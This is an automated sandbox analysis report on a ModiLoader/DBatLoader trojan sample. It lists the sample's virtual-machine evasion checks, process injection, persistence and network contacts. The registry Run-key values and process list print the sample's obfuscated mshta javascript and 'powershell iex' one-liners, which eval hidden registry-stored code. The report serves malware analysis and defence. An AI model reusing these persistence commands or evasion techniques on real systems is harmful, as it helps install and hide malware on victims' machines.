Malware Analysis Report

2024-10-19 07:03

Sample ID 240508-aezezafh2y
Target 2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118
SHA256 a55eceaf61aec51a64be7f8b9b2db0d7309b197dd9811378a619185b8887e25e
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a55eceaf61aec51a64be7f8b9b2db0d7309b197dd9811378a619185b8887e25e

Threat Level: Known bad

The file 2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Process spawned unexpected child process

Looks for VirtualBox drivers on disk

Looks for VirtualBox Guest Additions in registry

Checks for common network interception software

ModiLoader Second Stage

Looks for VMWare Tools registry key

Checks BIOS information in registry

Checks computer location settings

Drops startup file

Deletes itself

Maps connected drives based on registry

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-08 00:08

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-08 00:08

Reported

2024-05-08 00:10

Platform

win7-20240221-en

Max time kernel

134s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:Cjmw05o=\"IQ\";Dg9=new%20ActiveXObject(\"WScript.Shell\");tqY42R=\"DHLKt9sK\";ox1Fz=Dg9.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\pzadcohmp\\\\jhpvhyp\");m9Rzdob1=\"DJ5\";eval(ox1Fz);fKF6f=\"vkzEA\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:eazhd5X=\"LXg0\";l9F5=new%20ActiveXObject(\"WScript.Shell\");A0Dux2=\"HWuqf1o\";Yre4U=l9F5.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");Tlv3u4whx=\"9KdzotCP\";eval(Yre4U);lStG04bDw=\"W8rX\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d3afae00\\9a86c6c3.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8\ = "379d11eb" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:kFMJ49z=\"1W\";wj61=new ActiveXObject(\"WScript.Shell\");mriRa8yE=\"D5fq2Zc\";Hr0ti=wj61.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");hCn18dbA=\"ZWe35\";eval(Hr0ti);apXv4X1L=\"3CQ\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8 C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2596 wrote to memory of 2740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:jQ5EYzc="4TMLuba";h72s=new%20ActiveXObject("WScript.Shell");hUi0XB0j="dWq4a3v";w50sTa=h72s.RegRead("HKLM\\software\\Wow6432Node\\BDoThICmlp\\FmdJLBt");F7uYBHoD="IeuF";eval(w50sTa);by3c0WEzU="rqWRw";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:aojxef

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 67.176.157.250:80 tcp
IT 109.70.205.61:80 tcp
DE 158.226.30.255:80 tcp
AU 210.215.185.117:80 tcp
IT 88.32.128.249:80 tcp
NZ 121.99.36.23:80 tcp
JP 133.200.57.76:80 tcp
US 16.35.11.120:80 tcp
BR 138.120.252.131:80 tcp
US 131.9.16.176:80 tcp
US 76.150.211.188:80 tcp
US 151.190.172.117:80 tcp
US 141.104.240.2:8080 tcp
PL 83.17.16.208:80 tcp
US 148.52.104.16:80 tcp
US 206.83.155.177:80 tcp
FR 93.17.111.41:80 tcp
US 162.18.183.85:80 tcp
CN 59.71.187.66:80 tcp
N/A 100.101.140.95:80 tcp
JP 61.203.245.157:80 tcp
US 153.39.129.185:80 tcp
US 131.91.33.170:80 tcp
BR 179.226.116.42:80 tcp
US 65.207.116.105:80 tcp
US 72.174.123.112:80 tcp
JP 36.240.195.53:80 tcp
AU 220.235.72.193:80 tcp
US 68.142.124.147:80 tcp
US 168.21.28.187:80 tcp
IR 94.176.12.237:80 tcp
US 71.239.109.123:80 tcp
US 7.126.254.249:80 tcp
JP 60.81.142.237:80 tcp
US 171.70.216.153:80 tcp
HK 18.167.127.14:8080 tcp
RU 87.248.238.149:80 tcp
TH 122.154.201.162:80 tcp
BR 189.74.142.6:80 tcp
KR 114.207.80.72:80 tcp
US 44.3.104.217:80 tcp
US 150.177.199.161:443 tcp
US 55.234.181.239:80 tcp
ZA 105.254.29.93:80 tcp
CN 60.215.32.120:80 tcp
DE 53.234.56.239:80 tcp
US 159.172.153.44:80 tcp
US 44.182.43.90:8080 tcp
BE 143.169.10.174:80 tcp
KR 218.156.114.126:8080 tcp
TN 197.13.154.39:80 tcp
US 48.123.3.15:80 tcp
N/A 10.41.202.179:80 tcp
AU 115.187.224.68:8080 tcp
CN 120.91.46.216:80 tcp
US 75.116.26.60:80 tcp
SG 43.84.194.95:8080 tcp
US 166.171.15.94:80 tcp
KR 39.118.16.233:80 tcp
DE 95.33.192.98:80 tcp
US 35.22.78.106:80 tcp
CN 1.29.8.113:80 tcp
HK 154.23.81.74:80 tcp
HK 154.23.81.74:80 154.23.81.74 tcp
DE 98.67.234.52:443 tcp
JP 61.45.124.82:80 tcp
GB 156.61.196.243:80 tcp
DE 82.96.124.192:80 tcp
MY 60.48.52.121:80 tcp
MA 105.69.150.128:80 tcp
JP 150.33.34.220:80 tcp
CN 121.226.213.168:443 tcp
CH 153.109.114.226:80 tcp
TW 42.77.82.254:443 tcp
US 18.206.163.243:80 tcp
US 99.60.70.52:80 tcp
US 162.213.172.75:80 tcp
US 12.111.75.101:80 tcp
CN 219.219.45.51:80 tcp
JP 175.104.75.251:443 tcp
US 18.114.37.42:80 tcp
AU 120.20.229.149:80 tcp
GE 5.178.168.212:80 tcp
US 192.56.100.55:80 tcp
US 205.2.98.126:80 tcp
PL 217.96.141.27:80 tcp
US 15.28.202.26:80 tcp
NO 45.153.105.3:443 tcp
CN 110.106.233.71:80 tcp
NG 105.115.45.24:80 tcp
PK 103.137.27.12:80 tcp
MY 42.155.31.234:80 tcp
US 67.37.221.221:80 tcp
IE 52.51.45.46:80 tcp
JP 160.14.178.79:443 tcp
US 7.72.78.163:443 tcp
IT 151.36.227.107:80 tcp
US 70.8.55.209:8080 tcp
US 172.168.38.168:80 tcp
US 129.25.147.43:80 tcp
US 52.165.189.218:80 tcp
US 38.161.90.42:80 tcp
RU 84.204.73.60:80 tcp
US 98.149.48.138:80 tcp
CN 1.87.121.238:80 tcp
RO 86.34.233.64:80 tcp
CN 43.142.27.75:80 tcp
US 68.193.130.145:80 tcp
US 132.106.207.44:8080 tcp
US 3.228.173.223:80 tcp
US 30.207.22.243:80 tcp
DE 51.23.228.35:80 tcp
RU 89.20.62.164:80 tcp
TN 102.174.225.234:80 tcp
GB 20.117.45.233:80 tcp
US 192.193.53.64:80 tcp
US 99.137.27.19:80 tcp
US 55.219.143.165:80 tcp
US 108.73.88.191:80 tcp
US 11.244.18.177:80 tcp
US 146.15.54.13:80 tcp
NO 178.20.105.42:80 tcp
US 9.75.249.1:80 tcp
LT 158.129.3.164:80 tcp
US 12.241.51.178:80 tcp
DE 37.83.178.249:80 tcp
US 22.73.169.70:80 tcp
DE 194.175.235.74:80 tcp
MA 197.146.80.40:80 tcp
N/A 127.226.253.247:80 tcp
VN 113.174.145.28:80 tcp
JP 124.102.46.64:80 tcp
IT 151.76.163.91:80 tcp
FR 147.250.197.194:8080 tcp
US 143.20.109.199:80 tcp
US 170.227.218.204:80 tcp
RU 195.58.36.225:443 tcp
DE 217.229.233.110:80 tcp
US 17.15.93.242:80 tcp
JP 133.146.242.190:80 tcp
AU 140.159.183.192:80 tcp
SK 95.103.191.53:80 tcp
US 44.122.147.155:8080 tcp
US 166.159.46.26:80 tcp
GB 81.174.195.239:80 tcp

Files

memory/2332-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2332-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2332-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2332-6-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-8-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-9-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-7-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-10-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-11-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-12-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2740-21-0x00000000061B0000-0x0000000006286000-memory.dmp

memory/2508-23-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-25-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2740-26-0x00000000061B0000-0x0000000006286000-memory.dmp

memory/2508-30-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-35-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-27-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-36-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-38-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-28-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-29-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-44-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-31-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-46-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-33-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-32-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-48-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-66-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-57-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-47-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-45-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-43-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-58-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-56-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-55-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-54-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-42-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-41-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-40-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-39-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-37-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-34-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-49-0x0000000000110000-0x0000000000251000-memory.dmp

memory/2508-60-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1032-67-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-68-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-74-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-82-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-81-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-79-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-77-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-75-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-72-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-71-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-70-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-80-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-78-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-76-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-73-0x0000000000130000-0x0000000000271000-memory.dmp

memory/1032-69-0x0000000000130000-0x0000000000271000-memory.dmp

C:\Users\Admin\AppData\Local\d3afae00\d2239679.bat

MD5 f2ae417dcfcbe11a00d1102e6b587247
